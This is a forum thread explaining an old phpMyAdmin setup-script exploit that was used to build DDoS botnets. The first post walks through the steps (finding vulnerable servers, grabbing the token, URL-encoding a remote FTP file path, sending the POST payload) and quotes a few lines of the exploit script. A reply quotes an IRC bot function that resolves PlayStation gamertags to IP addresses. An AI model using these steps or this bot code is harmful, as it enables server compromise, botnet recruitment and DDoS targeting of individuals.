What's new

Web Python The phpMyAdmin LFI exploit.

Austin

Austin

What a random
10th Anniversary
Messages
443
Solutions
1
Reaction score
185
Points
210
Sin$
-7
If anyone has spent time interested in the topic of botnets and DDoS'ing, odds are if you've been around long enough you've heard of pma.

What is PMA?
PMA is probably one of if not the most notable botnet exploits ever in existence other than a few other mentions like Mirai or qBot.
What is PMA? Well it's just a short abbreviation for phpMyAdmin, pretty obvious right?

Anyhow, many may have exploited this vulnerability and somehow many still did not and still don't understand what's actually happening to achieve this exploit which contributed to an astronomical amount of botnets throughout the years.

Lets start with what the exploit is, and how it's an exploit. PMA started with a version of phpMyAdmin where if the user was to use the automatic setup wizard, the setup.php file would execute and like magic they would have PhpMyAdmin setup on their vps easily. Sounds like a perfect world and as we all know this is a perfect world.
So the main issue with this is, once the user setup their vps with the setup wizard the setup.php would execute without any sort of checks and after the automatic setup your server happened to have a fantastic feature included called an RCE.

What's an LFI?
Local File Inclusion is in the most simple terms imaginable... Taking a file from your location of choice and uploading it locally (on the target device directly) onto a device via some sort of exploit.
So in this instance the initial setup directory had to exist after setup was complete, and the config file in the setup scripts directory was exploitable, you could overwrite the config file with your "config" file and it would execute.

Getting into the PMA exploit...
So how this works is simple and annoying all at once.
Find a webserver with the vulnerable version of phpMyAdmin.
Once you've found the correct version, you'll then make sure the configuration directory is still available.
Now it gets a little dumb. So, you need a valid cookie when loading the config page.
Once you have that if you look at lines 68-72 you will notice these lines.

ftpr0 = ftp.replace(".", "%2E")
ftpr1 = ftpr0.replace(":", "%3A")
ftpr = ftpr1.replace("/", "%2F")

Then that long payload string. So the payload needed for this will be almost identical besides a few specific factors.
Next you need the token you got from the initial check of the webserver configuration page.
You need the length of the ftp or remote location of the file you want uploaded.
So with that you'd need to count the string length and in the payload it goes.
Then everything just url encode and add it to the pre-encoded payload string.
(Like I said. Other than the token, and file location length, the payload is copypasta)
Automated in the script below, but headers get filled in from the data we grabbed from the configuration page, and the payload string.
POST request gets sent, and once that was sent the attacker checks for the correct response.

I never did this exploit justice, but this is really all it comes down to.
This exploit is all but pretty dang dead at this point. I'm sure you could find something but that's bad and it's from '09.

Edit: For anyone new or beginning in the world of pentesting or related fields. This is probably one of the more relevant vulnerabilities still found in the wild today.
This would be a combination of LFI (Being able to see internal directories without proper sanitization) / RFI (Uploading a remote script file and having the server execute the file without checks) / and unauthenticated RCE (Executing the remote file upload). As well as being a great example of url exploiting as the original exploit used url encoding in the url as well as some escapes to exploit LFI via some directory transversal (ie: ../../../../).

Future idiot totally didn't rewrite a perl script in python at all... That would be stupid.

[Click here to view this link]
 
Operating System
  1. Windows
  2. Linux
Last edited:
nicholasbroo

nicholasbroo

Knowledge maybe Power, but Respect matters.
Legendary Veteran 10th Anniversary Fabled Veteran
Messages
3,265
Reaction score
2,084
Points
812
Sin$
7
I don't really know a lot about PHP / MiRC but what I can say is this is pretty cool to read about considering I'm a Security Researcher and haven't come across many of web vulnerabilities.

It was a great read as it holds fascinating information about how to protect yourself. Thanks Austin Austin for this wonderful post!
 
Professional

Professional

Admin
Administrator
Hidden Devils
Programmer Bug Finder Supreme Bounty Hunter
Messages
6,164
Reaction score
5,180
Points
2,112
Sin$
1,337
PHP:
    function psnresolve($ip)
    {

        $portscan = file_get_contents("https://api.playstationresolver.xyz/?TYPE=RESOLVE_PSN&GAMERTAG=" . $ip);
        str_replace("<br>", "-", $portscan);
        $this->privmsg($this->config['chan'], "[\2" . $portscan . "\2]");

    }
 
Austin

Austin

What a random
10th Anniversary
Messages
443
Solutions
1
Reaction score
185
Points
210
Sin$
-7
PHP:
    function psnresolve($ip)
    {

        $portscan = file_get_contents("https://api.playstationresolver.xyz/?TYPE=RESOLVE_PSN&GAMERTAG=" . $ip);
        str_replace("<br>", "-", $portscan);
        $this->privmsg($this->config['chan'], "[\2" . $portscan . "\2]");

    }
Gross.
 
Jason Borne

Jason Borne

Enthusiast
Messages
135
Reaction score
109
Points
115
Sin$
0
What you have here are the stepping stones to something really, really cool. It goes to show you that keeping your webserver's files UP TO DATE is really, really important.
I will leave this for those curious minds: [Click here to view this link]
 
Last edited:
Austin

Austin

What a random
10th Anniversary
Messages
443
Solutions
1
Reaction score
185
Points
210
Sin$
-7
What you have here are the stepping stones to something really, really cool. It goes to show you that keeping your webserver's files UP TO DATE is really, really important.
I will leave this for those curious minds: [Click here to view this link]
Surprised this resp. has a ton of the old stuff that I figured was gone or forgotten lol What a throwback.
 
Top Bottom
Login
Register